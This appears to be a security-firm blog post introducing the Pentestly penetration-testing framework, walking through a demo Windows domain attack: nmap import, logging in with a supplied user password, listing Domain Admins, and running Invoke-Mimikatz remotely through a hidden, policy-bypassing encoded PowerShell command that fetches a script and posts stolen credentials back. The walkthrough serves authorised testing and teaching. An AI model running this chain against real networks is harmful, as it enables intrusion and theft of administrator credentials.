Pentestly Framework: When Pentesting Meets Python and Powershell
Python appears to be an ever growing trend in the security community. Being able to connect Python tools together has proven beneficial for us. Powershell has also seen increasingly more use due to its wide availability in internal environments. Pentestly utilizes the power of these tools together in a familiar user experience.
Pentestly stands on the shoulders of giants. Below are the current tools utilized in Pentestly:
- recon-ng - Backend database for recon-ng is beautifully made and
leveraged in Pentestly for data manipulation
- wmiexec.py - Allows us to execute Powershell commands quickly and
easily via WMI
- smbmap.py - Useful utility for enumerating SMB shares
- Invoke-Mimikatz.ps1 - Implementation of Mimikatz in Powershell
- recon-ng - Backend database for recon-ng is beautifully made and
leveraged in Pentestly for data manipulation
- wmiexec.py - Allows us to execute Powershell commands quickly and
easily via WMI
- smbmap.py - Useful utility for enumerating SMB shares
- Invoke-Mimikatz.ps1 - Implementation of Mimikatz in Powershell
Below is a proof of concept demonstration of using Pentestly to auto detect Domain Admin from Domain User credentials (from Gladius) using Invoke-Mimikatz.
Demo - one step at a time
Import XML
As with any engagement, XML nmap results from our environment are imported into Pentestly:
As with any engagement, XML nmap results from our environment are imported into Pentestly:
[pentestly][demo] > load nmap
[pentestly][demo][nmap_xml] > set FILENAME /home/cduplantis/engagement/port-445.xml
FILENAME => /home/cduplantis/engagement/port-445.xml
[pentestly][demo][nmap_xml] > run
[*] 3 new records added.
-------
SUMMARY
-------
[*] 3 total (3 new) ports found.
[pentestly][demo][nmap_xml] > show ports
+------------------------------------------------------------+
| rowid | ip_address | host | port | protocol | module |
+------------------------------------------------------------+
| 1 | 10.202.208.4 | | 445 | tcp | nmap_xml |
| 2 | 10.202.208.111 | | 445 | tcp | nmap_xml |
| 3 | 10.202.208.112 | | 445 | tcp | nmap_xml |
+------------------------------------------------------------+
Credentials, credentials, credentials
We begin by attempting to authenticate with the following credentials received from Gladius:
zojix \ nsportsman : password1!
[pentestly][demo] > load login
[pentestly][demo][login] > set username nsportsman
[pentestly][demo][login] > set password password1!
[pentestly][demo][login] > set domain zojix
[pentestly][demo][login] > run
[*] Success - nsportsman:password1!@10.202.208.4
[*] Fail - nsportsman:password1!@10.202.208.111
[*] Success - nsportsman:password1!@10.202.208.112
[*] Testing execution access of credentials
[*] Execution: zojix\nsportsman:password1!@10.202.208.4 - echo
[*] Failed to execute: zojix\nsportsman:password1!@10.202.208.4
[*] Execution: zojix\nsportsman:password1!@10.202.208.112 - echo
[*] Successful execution: zojix\nsportsman:password1!@10.202.208.112
w00t! The key take away here is the following line:
[*] Successful execution: zojix\nsportsman:password1!@10.202.208.112
This tells us that we do have execution rights on 10.202.208.112.
WhoDunIt? Domain Admins
One useful cross-reference point is to grab the Domain and Enterprise admin list so that if we come across that user’s credentials in the domain, Pentestly will know that we have Domain Admin credentials.
One useful cross-reference point is to grab the Domain and Enterprise admin list so that if we come across that user’s credentials in the domain, Pentestly will know that we have Domain Admin credentials.
[pentestly][demo] > load get_dom # fuzzy searching for get_domain_admin_names
[pentestly][demo][get_domain_admin_names] > run
[*] Execution: zojix\nsportsman:password1!@10.202.208.112 - net groups "Domain Admins" /domain
[*] Found Domain Admin: zojix\Administrator
[*] Found Domain Admin: zojix\TheRealDA
[*] Execution: zojix\nsportsman:password1!@10.202.208.112 - net groups "Enterprise Admins" /domain
[*] Found Enterprise Admin: zojix\Administrator
[*] Found Enterprise Admin: zojix\TheRealDA
Mimikatz all the things
For the grand finale, let’s mimikatz the machines that we have execution access.
For the grand finale, let’s mimikatz the machines that we have execution access.
[pentestly][demo] > load mimi # Again, fuzzy searching for mimikatz
[pentestly][demo][mimikatz] > run
[*] Execution: zojix\nsportsman:password1!@10.202.208.112 - powershell -window hidden -exec bypass -NonInteractive -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBE…
...snip long command…
[*] Waiting for Powershell results
10.202.208.112 - - [04/Feb/2016 07:56:46] "GET /about.html HTTP/1.1" 200 -
10.202.208.112 - - [04/Feb/2016 07:56:50] "POST / HTTP/1.1" 200 -
Starting web server
After parsing the Mimikatz output, Pentestly attempts to cross reference the user list with the Domain Admin list and immediately recognizes a Domain Admin in the Mimikatz output. Here, Mimikatz recognized a Domain Admin logging into a user workstation machine. Silly, DA.
[*] Success! TheRealDA:<leetpassword>tryGUESSINGthisdrowssaP</leetpassword> - DOMAIN ADMIN!
You have one DA, do you want to continue to find more? [yN]
>
Download
git clone http://github.com/praetorian-inc/pentestly
Post a Comment